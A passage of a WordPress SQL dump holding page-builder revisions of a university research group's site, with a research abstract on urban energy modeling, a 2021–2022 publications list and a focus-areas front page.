h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-390 style-local-126-c34 position-relative\">\r\n              <!---->\r\n              <!---->\r\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\r\n                <!---->\r\n              </div>\r\n            </div>\r\n          </div>\r\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-391-outer style-local-126-c35-outer\">\r\n            <div data-colibri-id=\"126-c35\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-391 style-local-126-c35 position-relative\">\r\n              <!---->\r\n              <!---->\r\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n                <!---->\r\n                <div data-colibri-id=\"126-c36\" class=\"h-global-transition-all h-heading style-392 style-local-126-c36 position-relative h-element\">\r\n                  <!---->\r\n                  <div class=\"h-heading__outer style-392 style-local-126-c36\">\r\n                    <!---->\r\n                    <!---->\r\n                    <h5 class=\"\">Urban Scale Energy Assessments</h5>\r\n                  </div>\r\n                </div>\r\n                <div data-colibri-id=\"126-c37\" class=\"h-text h-text-component style-394 style-local-126-c37 position-relative h-element\">\r\n                  <!---->\r\n                  <!---->\r\n                  <div class=\"\">\r\n                    <p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities\r\n                      in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment\r\n                      of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption\r\n                      patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and\r\n                      propose a plan for grid distribution optimized for human-centric usage and need.</p>\r\n                  </div>\r\n                </div>\r\n              </div>\r\n            </div>\r\n          </div>\r\n        </div>\r\n      </div>\r\n    </div>\r\n  </div>\r\n</div>','Research','','inherit','closed','closed','','126-revision-v1','','','2023-09-29 10:19:53','2023-09-29 14:19:53','',126,'https://gsudice.dataconn.net/?p=1427',0,'revision','',0),(1428,1,'2023-09-29 10:20:16','2023-09-29 14:20:16','<div data-colibri-id=\"608-c1\" class=\"style-413 style-local-608-c1 position-relative\">\r\n  <!---->\r\n  <div data-colibri-component=\"section\" data-colibri-id=\"608-c2\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-417 style-local-608-c2 position-relative\">\r\n    <!---->\r\n    <!---->\r\n    <div class=\"h-section-grid-container h-section-boxed-container\">\r\n      <!---->\r\n      <div data-colibri-id=\"608-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-418 style-local-608-c3 position-relative\">\r\n        <!---->\r\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\r\n          <!---->\r\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-419-outer style-local-608-c4-outer\">\r\n            <div data-colibri-id=\"608-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-419 style-local-608-c4 position-relative\">\r\n              <!---->\r\n              <!---->\r\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\r\n                <!---->\r\n                <div data-colibri-id=\"608-c5\" class=\"h-text h-text-component style-420 style-local-608-c5 position-relative h-element\">\r\n                  <!---->\r\n                  <!---->\r\n                  <div class=\"\">\r\n                    <p><strong>2022</strong></p>\r\n                    <p>Atkinson, S. F., Kala, A. K., &amp; Tiwari, C. (2022). Cascading effects of COVID-19 on population mobility and air quality: An exploration including place characteristics using geovisualization. Geospatial Health, 17(s1).</p>\r\n                    <p>Angelique B.Willis, Mildred Addo, Lauren E.Yoder, Cassandra K. Johnson, Sydney L. Resler, Leticia J. Young, Elizabeth Armstrong-Mensah(2022). Individual and Community Level Factors Related to Sanitation, Water Quality, Treatment and\r\n                      Management in Rural Communities in Accra, Ghana: A Field Study Report.</p>\r\n                    <p><strong>2021</strong></p>\r\n                    <p>Northeim, K., Tiwari, C., &amp; Oppong, J. (2021). Surface ozone monitoring and policy: A geospatial decision support tool for suitable location of monitoring stations in urban areas. Environmental Science &amp; Policy, 126, 48-59.</p>\r\n                    <p>Gwalani, H., Tiwari, C., &amp; Mikler, A. R. (2021). Evaluation of heuristics for the p-median problem: Scale and spatial demand distribution. Computers, Environment and Urban Systems, 88, 101656.</p>\r\n                    <p>Torres, A. V., Tiwari, C., &amp; Atkinson, S. F. (2021). Progress in ecosystem services research: A guide for scholars and practitioners. Ecosystem Services, 49, 101267.</p>\r\n                    <p>Northeim, K., Marks, C., &amp; Tiwari, C. (2021). Evaluating spatial patterns of seasonal ozone exposure and incidence of respiratory emergency room visits in Dallas-Fort Worth. PeerJ, 9, e11066.</p>\r\n                    <p>Haynes, D., &amp; Tiwari, C. (2021). Space-time Classification Index for Assessing COVID-19 Hotspots. medRxiv.</p>\r\n                    <p>Oppong, J., &amp; Tiwari, C. (2021). GIS and Spatial Representations: Challenges and Missteps. In COVID-19 and Similar Futures (pp. 417-422). Springer, Cham.</p>\r\n                    <p>O’Neill, M., Poole, M., &amp; Mikler, A. R. (2021). A Synergistic Approach to Data-Driven Response Planning. Disaster medicine and public health preparedness, 15(2), 232-238.</p>\r\n                    <p>Irany, F. A., Iyer, A., Flores, R. B., &amp; Mikler, A. R. (2021). The Multi-phase spatial meta-heuristic algorithm for public health emergency transportation. arXiv preprint arXiv:2107.04125.</p>\r\n                    <p>Qian, W., Bhowmick, S., O’Neill, M., Ramisetty-Mikler, S., &amp; Mikler, A. R. (2021). Applying a Probabilistic Infection Model for studying contagion processes in contact networks. Journal of Computational Science, 54, 101419.</p>\r\n                    <p>Gu, Q., Formby, D., Ji, S., Saltaformaggio, B., Bourgeois, A., &amp; Beyah, R. A. (2021). This Hacker Knows Physics: Device Physics Aware Mimicry Attacks in Cyber-Physical Systems. IEEE Transactions on Dependable and Secure Computing.</p>\r\n                    <p>Huang, Y., Cai, Z., Pang, J., Xie, Z., &amp; Bourgeois, A. G. (2021, June). Game Theory Based Privacy Protection for Context-Aware Services with Long-Term Time Series Data. In ICC 2021-IEEE International Conference on Communications\r\n                      (pp. 1-6). IEEE.</p>\r\n                    <p>Rosen, A., Levin, B., &amp; Bourgeois, A. G. (2021, June). Autonomous Load Balancing in Distributed Hash Tables Using Churn and the Sybil Attack. In 2021 IEEE International Parallel and Distributed Processing Symposium Workshops (IPDPSW)\r\n                      (pp. 631-640). IEEE.</p>\r\n                    <p>Tharpe, B., Bourgeois, A. G., &amp; Ashok, A. (2021, June). A do-it-yourself computer vision based robotic ball throw trainer. In Proceedings of the 19th Annual International Conference on Mobile Systems, Applications, and Services\r\n                      (pp. 505-506).</p>\r\n                    <p>Huang, Y., Li, W., Wang, J., Cai, Z., &amp; Bourgeois, A. G. (2021). Privacy protection among three antithetic-parties for context-aware services. Journal of Network and Computer Applications, 191, 103115.</p>\r\n                    <p>Sidharthan, S., Ashok, A., &amp; Bourgeois, A. (2021, October). Internet service via UAV: user centric comprehensive attack surface analysis. In Proceedings of the 12th ACM Wireless of the Students, by the Students, and for the Students\r\n                      (S3) Workshop (pp. 1-2).</p>\r\n                    <p>Younis, A. A., Sunderraman, R., Metzler, M., &amp; Bourgeois, A. G. (2021). Developing parallel programming and soft skills: A project based learning approach. Journal of Parallel and Distributed Computing, 158, 151-163.</p>\r\n                    <p>Ye, H., Yang, X., Takac, M., Sunderraman, R., &amp; Ji, S. (2021). Improving text-to-image synthesis using contrastive learning. arXiv preprint arXiv:2107.02423.</p>\r\n                    <p>Abeysinghe, B., Shah, D., Freas, C., Harrison, R., &amp; Sunderraman, R. (2021). POSLAN: Disentangling Chat with Positional and Language encoded Post Embeddings. arXiv preprint arXiv:2107.03529.</p>\r\n                    <p>Srimath, S., Ye, Y., Sarker, K., Sunderraman, R., &amp; Ji, S. (2021, October). Human Activity Recognition from RGB Video Streams Using 1D-CNNs. In 2021 IEEE SmartWorld, Ubiquitous Intelligence &amp; Computing, Advanced &amp; Trusted\r\n                      Computing, Scalable Computing &amp; Communications, Internet of People and Smart City Innovation (SmartWorld/SCALCOM/UIC/ATC/IOP/SCI) (pp. 295-302). IEEE.</p>\r\n                    <p>Younis, A. A., Sunderraman, R., Metzler, M., &amp; Bourgeois, A. G. (2021). Developing parallel programming and soft skills: A project based learning approach. Journal of Parallel and Distributed Computing, 158, 151-163.</p>\r\n                    <p>Kleinsasser, M., Tharpe, B., Akula, N., Tirumani, H., Sunderraman, R., &amp; Bourgeois, A. G. (2022, January). Detecting and Predicting Sleep Activity using Biometric Sensor Data. In 2022 14th International Conference on COMmunication\r\n                      Systems &amp; NETworkS (COMSNETS) (pp. 19-24). IEEE.</p>\r\n                  </div>\r\n                </div>\r\n              </div>\r\n            </div>\r\n          </div>\r\n        </div>\r\n      </div>\r\n    </div>\r\n  </div>\r\n</div>','Publications','','inherit','closed','closed','','608-revision-v1','','','2023-09-29 10:20:16','2023-09-29 14:20:16','',608,'https://gsudice.dataconn.net/?p=1428',0,'revision','',0),(1429,1,'2023-09-29 10:23:19','2023-09-29 14:23:19','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Overlappable\",\"attrs\":{\"id\":\"overlappable\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c4\",\"parentId\":\"20-c3\",\"partialId\":20,\"styleRef\":336,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c5\",\"parentId\":\"20-c3\",\"partialId\":20,\"styleRef\":337,\"type\":\"content\"}],\"id\":\"20-c3\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":335,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c7\",\"parentId\":\"20-c6\",\"partialId\":20,\"children\":[{\"name\":\"hop-heading\",\"slot\":null,\"parentId\":\"20-c7\",\"index\":0,\"id\":\"20-c8\",\"partialId\":20,\"styleRef\":334,\"type\":\"content\",\"props\":{\"content\":\"Focus Areas<br>\"}}],\"styleRef\":333,\"type\":\"content\"}],\"id\":\"20-c6\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":331,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"20-c10\",\"parentId\":\"20-c9\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c10\",\"index\":0,\"id\":\"20-c11\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/server\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c10\",\"index\":1,\"id\":\"20-c12\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"disease &amp; disaster modeling<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c10\",\"index\":1,\"id\":\"20-c13\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Develop data-driven, computational solutions to address challenges posed by disaster and disease risk assessment, forecasting, and mitigation, including issues aimed at assessing and reducing structural disparities<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c14\",\"parentId\":\"20-c9\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c14\",\"index\":0,\"id\":\"20-c15\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/database\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c14\",\"index\":1,\"id\":\"20-c16\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"data as a service<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c14\",\"index\":1,\"id\":\"20-c17\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Provide data and computational support to researchers who need extensive data processing and analysis but may not have the necessary technical skills and computational infrastructure<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c18\",\"parentId\":\"20-c9\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c18\",\"index\":0,\"id\":\"20-c19\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/users\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c18\",\"index\":1,\"id\":\"20-c20\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"Impact assessment<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c18\",\"index\":1,\"id\":\"20-c21\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Facilitate application of data analysis tools that can spark critical insights into the impacts of disasters and diseases on societies and the environment, particularly among vulnerable population groups<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"}],\"id\":\"20-c9\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":272,\"type\":\"content\"}],\"id\":\"20-c2\",\"parentId\":\"20-c1\",\"partialId\":20,\"styleRef\":271,\"type\":\"content\"}],\"id\":\"20-c1\",\"partialId\":20,\"styleRef\":228,\"type\":\"content\"}','','','inherit','closed','closed','','168-revision-v1','','','2023-09-29 10:23:19','2023-09-29 14:23:19','',168,'https://gsudice.dataconn.net/?p=1429',0,'revision','',0),(1430,1,'2023-09-29 10:23:19','2023-09-29 14:23:19','<div data-colibri-id=\"20-c1\" class=\"style-228 style-local-20-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"20-c2\" id=\"overlappable\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-271 style-local-20-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"20-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-335 style-local-20-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-336-outer style-local-20-c4-outer\">\n            <div data-colibri-id=\"20-c4\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-336 style-local-20-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-337-outer style-local-20-c5-outer\">\n            <div data-colibri-id=\"20-c5\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-337 style-local-20-c5 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"20-c6\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-331 style-local-20-c6 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-333-outer style-local-20-c7-outer\">\n            <div data-colibri-id=\"20-c7\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-333 style-local-20-c7 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"20-c8\" class=\"h-global-transition-all h-heading style-334 style-local-20-c8 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-334 style-local-20-c8\">\n                    <!---->\n                    <!---->\n                    <h1 class=\"\">Focus Areas</h1>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"20-c9\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-0 gutters-row-v-2 style-272 style-local-20-c9 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-0 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c10-outer\">\n            <div data-colibri-id=\"20-c10\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c10 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"20-c11\" class=\"h-icon style-274 style-local-20-c11 position-relative h-element\">\n                  <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c11-icon\"><!--Icon by Font Awesome (https://fontawesome.com)-->\n    <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"server\" viewBox=\"0 0 1792 1896.0833\">\n      <path d=\"M128 1408h1024v-128H128v128zm0-512h1024V768H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zM128 384h1024V256H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm0-512q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm96 832v384H0v-384h1792zm0-512v384H0V640h1792zm0-512v384H0V128h1792z\"></path>\n    </svg></span></div>\n                <div data-colibri-id=\"20-c12\" class=\"h-global-transition-all h-heading style-275 style-local-20-c12 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-275 style-local-20-c12\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">disease &amp; disaster modeling</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"20-c13\" class=\"h-text h-text-component style-276 style-local-20-c13 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Develop data-driven, computational solutions to address challenges posed by disaster and disease risk assessment, forecasting, and mitigation, including issues aimed at assessing and reducing structural disparities</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c14-outer\">\n            <div data-colibri-id=\"20-c14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c14 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"20-c15\" class=\"h-icon style-274 style-local-20-c15 position-relative h-element\">\n                  <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c15-icon\"><!--Icon by Font Awesome (https://fontawesome.com)-->\n    <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"database\" viewBox=\"0 0 1542.7035 1896.0833\">\n      <path d=\"M768 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5T103 896 0 768V598q119 84 325 127t443 43zm0 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1536v-170q119 84 325 127t443 43zm0-384q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1152V982q119 84 325 127t443 43zM768 0q208 0 385 34.5t280 93.5 103 128v128q0 69-103 128t-280 93.5T768 640t-385-34.5T103 512 0 384V256q0-69 103-128t280-93.5T768 0z\"></path>\n    </svg></span></div>\n                <div data-colibri-id=\"20-c16\" class=\"h-global-transition-all h-heading style-275 style-local-20-c16 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-275 style-local-20-c16\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">data as a service</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"20-c17\" class=\"h-text h-text-component style-276 style-local-20-c17 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Provide data and computational support to researchers who need extensive data processing and analysis but may not have the necessary technical skills and computational infrastructure</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c18-outer\">\n            <div data-colibri-id=\"20-c18\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c18 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"20-c19\" class=\"h-icon style-274 style-local-20-c19 position-relative h-element\">\n                  <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c19-icon\"><!--Icon by Font Awesome (https://fontawesome.com)-->\n    <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"users\" viewBox=\"0 0 1920 1896.0833\">\n      <path d=\"M593 896q-162 5-265 128H194q-82 0-138-40.5T0 865q0-353 124-353 6 0 43.5 21t97.5 42.5T384 597q67 0 133-23-5 37-5 66 0 139 81 256zm1071 637q0 120-73 189.5t-194 69.5H523q-121 0-194-69.5T256 1533q0-53 3.5-103.5t14-109T300 1212t43-97.5 62-81 85.5-53.5T602 960q10 0 43 21.5t73 48 107 48 135 21.5 135-21.5 107-48 73-48 43-21.5q61 0 111.5 20t85.5 53.5 62 81 43 97.5 26.5 108.5 14 109 3.5 103.5zM640 256q0 106-75 181t-181 75-181-75-75-181 75-181T384 0t181 75 75 181zm704 384q0 159-112.5 271.5T960 1024 688.5 911.5 576 640t112.5-271.5T960 256t271.5 112.5T1344 640zm576 225q0 78-56 118.5t-138 40.5h-134q-103-123-265-128 81-117 81-256 0-29-5-66 66 23 133 23 59 0 119-21.5t97.5-42.5 43.5-21q124 0 124 353zm-128-609q0 106-75 181t-181 75-181-75-75-181 75-181 181-75 181 75 75 181z\"></path>\n    </svg></span></div>\n                <div data-colibri-id=\"20-c20\" class=\"h-global-transition-all h-heading style-275 style-local-20-c20 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-275 style-local-20-c20\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Impact assessment</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"20-c21\" class=\"h-text h-text-component style-276 style-local-20-c21 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Facilitate application of data analysis tools that can spark critical insights into the impacts of disasters and diseases on societies and the environment, particularly among vulnerable population groups</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Front Page','','inherit','closed','closed','','20-revision-v1','','','2023-09-29 10:23:19','2023-09-29 14:23:19','',20,'https://gsudice.dataconn.net/?p=1430',0,'revision','',0),(1433,1,'2023-09-29 10:23:19','2023-09-29 14:23:19','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Custom\",\"attrs\":{\"id\":\"custom\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"id\":\"608-c4\",\"parentId\":\"608-c3\",\"partialId\":608,\"children\":[{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"608-c4\",\"index\":0,\"id\":\"608-c5\",\"partialId\":608,\"styleRef\":420,\"type\":\"content\",\"props\":{\"content\":\"<p><strong>2022<\\/strong><\\/p><p>Atkinson, S. F., Kala, A. K., &amp; Tiwari, C. (2022). Cascading effects of COVID-19 on population mobility and air quality: An exploration including place characteristics using geovisualization. Geospatial Health, 17(s1).<\\/p><p>Angelique B.Willis, Mildred Addo, Lauren E.Yoder, Cassandra K. Johnson, Sydney L. Resler, Leticia J. Young, Elizabeth Armstrong-Mensah(2022). Individual and&nbsp;<span>Community Level Factors Related to Sanitation, Water Quality, Treatment and Management in Rural Communities in Accra, Ghana: A Field Study Report.<\\/span><\\/p><p>Parcells, R. 2022. Aedes Mosquito Early Warning System: Challenges Integrating Public Health Surveillance Data. Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.<\\/p><p>Schuh, E. 2022.&nbsp;Building a resilient energy grid: development of an urban-scale model for energy prediction.&nbsp;Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.<\\/p><p>Anand, A. 2022.&nbsp;Aedes Mosquito Early Warning System: Integrating Disparate Environmental Datasets.&nbsp;Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.<\\/p><p>Garland, R. 2022.&nbsp;GSU (Georgia State University) Contact Networks and Interventions.&nbsp;Georgia State Undergraduate Research Conference (GSURC), Atlanta, GA.<\\/p><p>McDaniel, Emma L; Henry Phan; Puneet Singh; Chetan Tiwari; and Armin R Mikler. 2022. Evaluating Potential Exposure Risk to Gastrointestinal Disease-Causing Specimens after Documented Wastewater Spills in Atlanta. Poster presented at: American Association of Geographers, Annual Meeting 2022.<\\/p><p><br><\\/p><p><strong>2021<\\/strong><\\/p><p>Northeim, K., Tiwari, C., &amp; Oppong, J. (2021). Surface ozone monitoring and policy: A geospatial decision support tool for suitable location of monitoring stations in urban areas. Environmental Science &amp; Policy, 126, 48-59.<\\/p><p>Gwalani, H., Tiwari, C., &amp; Mikler, A. R. (2021). Evaluation of heuristics for the p-median problem: Scale and spatial demand distribution. Computers, Environment and Urban Systems, 88, 101656.<\\/p><p>Torres, A. V., Tiwari, C., &amp; Atkinson, S. F. (2021). Progress in ecosystem services research: A guide for scholars and practitioners. Ecosystem Services, 49, 101267.<\\/p><p>Northeim, K., Marks, C., &amp; Tiwari, C. (2021). Evaluating spatial patterns of seasonal ozone exposure and incidence of respiratory emergency room visits in Dallas-Fort Worth. PeerJ, 9, e11066.<\\/p><p>Haynes, D., &amp; Tiwari, C. (2021). Space-time Classification Index for Assessing COVID-19 Hotspots. medRxiv.<\\/p><p>Oppong, J., &amp; Tiwari, C. (2021). GIS and Spatial Representations: Challenges and Missteps. In COVID-19 and Similar Futures (pp. 417-422). Springer, Cham.<\\/p><p>O\\u2019Neill, M., Poole, M., &amp; Mikler, A. R. (2021). A Synergistic Approach to Data-Driven Response Planning. Disaster medicine and public health preparedness, 15(2), 232-238.<\\/p><p>Irany, F. A., Iyer, A., Flores, R. B., &amp; Mikler, A. R. (2021). The Multi-phase spatial meta-heuristic algorithm for public health emergency transportation. arXiv preprint arXiv:2107.04125.<\\/p><p>Qian, W., Bhowmick, S., O\\u2019Neill, M., Ramisetty-Mikler, S., &amp; Mikler, A. R. (2021). Applying a Probabilistic Infection Model for studying contagion processes in contact networks. Journal of Computational Science, 54, 101419.<\\/p><p>Gu, Q., Formby, D., Ji, S., Saltaformaggio, B., Bourgeois, A., &amp; Beyah, R. A. (2021). This Hacker Knows Physics: Device Physics Aware Mimicry Attacks in Cyber-Physical Systems. IEEE Transactions on Dependable and Secure 